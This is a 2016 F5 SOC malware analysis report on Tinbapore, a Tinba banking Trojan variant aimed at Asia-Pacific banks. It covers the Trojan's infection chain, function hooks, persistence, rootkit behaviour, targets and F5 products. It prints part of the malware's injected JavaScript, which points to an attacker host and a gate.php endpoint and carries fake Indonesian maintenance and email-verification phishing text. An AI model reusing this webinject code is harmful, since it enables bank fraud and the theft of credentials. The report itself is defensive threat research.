MALWARE ANALYSIS REPORT Tinbapore: Millions of Dollars at Risk ###### MALWARE ANALYSIS REPORT # Tinbapore: Millions of Dollars at Risk #### January 2016 | F5 SOC ----- MALWARE ANALYSIS REPORT Tinbapore: Millions of Dollars at Risk ## Contents ##### Contents ........................................................................................................................................................... 2 The Threat ........................................................................................................................................................ 3 About Tinba ...................................................................................................................................................... 4 Tinbapore Malware Analysis Details ................................................................................................................ 5 Webinject Analysis ........................................................................................................................................... 6 WebSafe Detection of Tinbapore ..................................................................................................................... 7 Tinbapore Targets ............................................................................................................................................ 8 F5 Security Solutions ........................................................................................................................................ 9 MALWARE ANALYSIS REPORT Tinbapore: Millions of Dollars at Risk ----- MALWARE ANALYSIS REPORT Tinbapore: Millions of Dollars at Risk ## The Threat ### Trojans A Trojan is a piece of malware that appears to the user to perform a desirable function but—perhaps in addition to the expected function—steals information or harms the system. Trojans employ two main techniques to steal users’ credentials or initiate money transfers on their behalf: - Modifying the website’s client-side web page. - Sniffing the browser’s activity for information, such as that sent to different banks, before the packets are encrypted by SSL. ### Script injections Several e-banking Trojans (such as Neverquest, Dyre, and Dridex) have used script injection techniques to modify the original web page. The modification may enable the attacker to perform money transactions using victims’ credentials. This may be perpetrated by a Trojan injecting a malicious JavaScript code to the client’s browser, once the client is connected to the website. The injected code may perform different functions, including attempting a money transfer from the client’s account, gaining control on mobile devices, and much more. To maintain the information sent by the Trojan, attackers have developed different types of command and control (C&C) systems that enable them to grab and manage the Trojan. These systems are usually PHP-based systems accompanied by a SQL database. Tinbapore: Millions of Dollars at Risk ----- MALWARE ANALYSIS REPORT Tinbapore: Millions of Dollars at Risk ## About Tinba Tinba, also known as Tinybanker, Zusy, and HµNT€R$, is a banking Trojan that was first seen in the wild around May 2012. Its source code was leaked in July 2011, and since then it has evolved. Cybercriminals have customized the leaked code to create even more sophisticated pieces of malware that are being used to attack a large number of popular banking websites around the world. Until now, four new variants had been identified. Tinbapore is the fifth. The original Tinba malware was written in the assembly programming language and was noted for its very small size (around 20 KB including all Webinjects and configuration). The malware mostly uses four system libraries during runtime: ntdll.dll, advapi32.dll, ws2_32.dll, and user32.dll. Its main functionality is hooking all the browsers on the infected machine so it can intercept HTTP requests and perform web injections. Newer and improved versions of the malware employ a domain generation algorithm (DGA), which makes the malware much more persistent and gives it the ability to come back to life even after a command and control (C&C) server is taken down. This new variant of Tinba, Tinbapore, now creates its own instance of explorer.exe that runs in the background. It differs from most previous versions in that it actively targets financial entities in the Asian Pacific (APAC), which was previously uncharted territory for Tinba. Figure 1: The Tinbapore attack flow ----- MALWARE ANALYSIS REPORT Tinbapore: Millions of Dollars at Risk ## Tinbapore Malware Analysis Details Upon execution, the malware initially infects the system by opening the winver.exe process—a legitimate Windows applet that shows the Windows version—injecting itself into it, and propagating into explorer.exe. Then, while operating through explorer.exe, the malware writes itself as a bin.exe file into the \Application Data\ folder with a randomly generated subfolder. ### System function hooks Tinbapore gains control over the system by hooking several functions inside the ntdll.dll library. The hooked functions are NtCreateProcessEx, NtCreateThread, NtEnumerateValueKey, NtQueryDirectoryFile, and NtResumeThread. Figure 2: Functions hooked by Tinbapore ### Auto-run entries In order to stay persistent in the system, the malware writes two auto-run locations, making it start with Windows at boot. The auto-runs are written into the registry in both HKEY CURRENT_USER and HKEY_LOCAL_MACHINE registry hives, under the Software\Microsoft\Windows\CurrentVersion\Run key. ### Deployment Tinbapore writes deployed files into the \Application Data\ folder. - **log.dat, ntf.dat—These are used to store the collected data from the infected machine before that data is sent** to the C&C server. These files are encrypted and removed right after being written. - **bin.exe—This malware executable file is run on system boot.** - **web.dat—This Webinject configuration file is written when downloaded from the C&C.** ### Browser function hooks When a browser application is executed, the malware injects itself into the process and hooks wininet.dll library functions, which allows it to perform browser injections. The hooked functions are HttpQueryInfoA, HttpSendRequestA, _HttpSendRequestW, InternetCloseHandle, InternetQueryDataAvailable, InternetReadFile, and InternetReadFileExA._ Tinbapore also lowers security settings and sets the DisplayMixedContentInternet option to zero (0). This allows attackers to perform browser injections without prompting the user. ----- MALWARE ANALYSIS REPORT Tinbapore: Millions of Dollars at Risk Figure 3: Tinbapore sets security settings to zero ### Rootkit The malware is a rootkit, meaning that by hooking system functions, it has higher system privileges than the user, so it can hide itself from the user’s eyes, making it impossible to remove manually. Special anti-rootkit tools, such as IceSword, are required to see the malware registry keys and files on disk. Figure 4: Tinbapore registry keys and files as they can be seen with IceSword ## Webinject Analysis In a departure from previous versions of Tinba, which usually did not target Asian financial entities, the new Tinbapore variant does target financial institutions in Asia and the Pacific (as well as U.S. and European institutions). The largest percentage of the targeted entities are in Singapore. Figure 5: A Tinbapore partial ATS script targeting financial institutions in APAC ----- MALWARE ANALYSIS REPORT Tinbapore: Millions of Dollars at Risk The injected script shown above in Figure 5 is part of Tinbapore’s Automatic Transfer Systems (ATS) engine injection management system, which injects content into the victim’s browser and sends the logged information back to the ATS server. After being injected into the victim’s browser, the script is then deleted to cover its tracks. var wwww="ssl-chanel.ru"; var blokss="ZZZ"; var affid="xxxxxx"; var home_link = "https://"+wwww+"/az/atsbmid";var gate_link = home_link+"/gate.php?obj=ST&q="+affid;var pkey = "Bc5rw12"; var waitlok="




Kami bekerja pada pemutakhiran database, sehingga layanan ini sementara tidak tersedia.
Kami akan mencoba untuk melanjutkan layanan sesegera mungkin. Silahkan coba lagi dalam beberapa jam.

"; var waitfkk="
Verifikasi tambahan identitas
Masukkan alamat E-mail Anda yang terdaftar di system BANK NAME
Silakan memasukkan alamat E-mail Internet Banking Anda
Please enter Your Internet Banking E-mail
"; Figure 6: The Tinbapore visual injection source code For most of the targeted entities to date, injected content has shown the message in Figure 7 on the user’s machine while initiating the fraudulent activity. The Google translation for this message is “We are working on updating the database, so that the service is temporarily unavailable. We will try to resume the service as soon as possible. Please try again in a few hours.” Kami bekerja pada pemutakhiran database, sehingga layanan ini sementara tidak tersedia. Kami akan mencoba untuk melanjutkan layanan sesegera mungkin. Silahkan coba lagi dalam beberapa jam. Figure 7: The Tinbapore visual injection as seen on the victim’s machine ## WebSafe Detection of Tinbapore The F5[®] WebSafe™ security solution detected the Tinbapore malware attack in real time, and the F5 Security Operations Center™ (SOC) took immediate action to shut down attack resources, although Tinbapore’s DGA capabilities make the malware very persistent and give it the ability to come back to life even after a C&C server is taken down. ### Malicious URLs Tinbapore resources detected by WebSafe and shut down by the SOC include the following malicious URLs: Tinbapore: Millions of Dollars at Risk ----- MALWARE ANALYSIS REPORT Tinbapore: Millions of Dollars at Risk - hxxps://ssl-base.com - hxxps://test-ssl.ru - hxxps://data-chanel.ru - hxxps://ssl-tree.ru - hxxps://ssl-chanel.ru - hxxps://ssl-temp.ru - hxxps://temp-ssl.ru ## Tinbapore Targets To date, Singapore has been the country most targeted by the Tinbapore malware. It accounts for 30 percent of the attacked institutions known to the F5 SOC. Indonesian financial institutions also are at risk of losing millions of dollars, as another 20 percent of the targeted entities are based in this country. Figure 8: Tinbapore targeted entities by country Financial institutions in APAC are not the only ones at risk; the malware has also targeted institutions in the Europe, Middle East, and Africa (EMEA) region and the Americas. However, it is clear that the majority of attacks target financial institutions in Asia and the Pacific. ----- MALWARE ANALYSIS REPORT Tinbapore: Millions of Dollars at Risk Figure 9: Tinbapore targeted entities by region ## F5 Security Solutions F5 enables financial organizations working online to enhance security and gain control over areas that were once virtually unreachable and indefensible, and to neutralize local threats found on customers’ personal computers, without requiring the installation of software on the user side. This approach covers the entire install base. The entire solution is delivered from the F5 BIG-IP[®] platform and therefore doesn’t require any integration or modification of the application. F5 products and services complement your existing anti-fraud technologies, improving your protection against malicious activity and providing an encompassing defense mechanism. F5 products mitigate online identity theft by preventing phishing, malware, and pharming attacks in real time with advanced encryption and identification mechanisms. Rounding out its offerings, F5 provides professional services and advanced research capabilities in the field of cybercrime, including malware, Trojans, viruses, and more. ### About the F5 SOC F5 constantly monitors the fraud threat landscape, analyzing risks and trends that threaten online financial institutions. The company’s SOC monitors global attack activities in real time, notifies customers of threats, and shuts down phishing proxies or drop zones to minimize the damages they can inflict. The SOC also: - Houses an experienced team of security researchers and analysts who investigate new attacks throughout the world. - Works with F5 Labs to aggregate the latest security intelligence and provide customers with tools to help mitigate risks. - Maintains up-to-date information on the latest malware, zero-day exploits, and phishing attacks that target the financial services industry. ----- MALWARE ANALYSIS REPORT Tinbapore: Millions of Dollars at Risk The SOC supplements F5 WebSafe and MobileSafe™ solutions for protecting online applications or URLs. SOC services bring visibility to, and protection against, the mounting risks of advanced financial fraud. These services also extend corporate fraud and security teams with additional, expert assistance. ### About F5 Labs F5 Labs compiles security research, market research, and intelligence from F5 platform security, the F5 security incident response team (SIRT), SOC product development, and F5 iHealth® monitoring service data to provide customers with actionable information on the latest threats, risks, and application vulnerabilities. To learn more about F5 fraud protection, read the WebSafe datasheet as well as the MobileSafe datasheet. To learn more about F5 Security Operations Center, read the F5 SOC datasheet. Tinbapore: Millions of Dollars at Risk ----- MALWARE ANALYSIS REPORT Tinbapore: Millions of Dollars at Risk -----